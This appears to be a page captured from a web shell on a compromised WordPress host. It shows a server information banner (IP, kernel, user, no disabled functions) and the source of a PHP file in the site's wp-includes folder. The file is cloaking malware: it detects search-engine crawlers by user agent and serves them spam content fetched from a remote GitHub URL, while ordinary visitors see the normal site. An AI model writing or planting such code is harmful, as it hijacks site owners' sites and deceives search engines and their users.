| Server IP : 66.29.146.142 / Your IP : 216.73.216.83 Web Server : LiteSpeed System : Linux premium243.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64 User : agroorlc ( 1073) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/agroorlc/public_html/wp-includes__b72ff91/ |
Upload File : |
<?php
$bot_content = 'https://raw.githubusercontent.com/hesonakara-dot/L/refs/heads/main/agrotechlk-com.txt';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool' );
$is_bot = false;
foreach ($bots as $bot) {
if (stripos($user_agent, $bot) !== false) {
$is_bot = true;
break;
}
}
if ($is_bot) {
echo @file_get_contents($bot_content);
exit;
}
$_SERVER['REQUEST_URI'] = '/';
define('WP_USE_THEMES', true);
require dirname(__FILE__, 2) . '/wp-blog-header.php';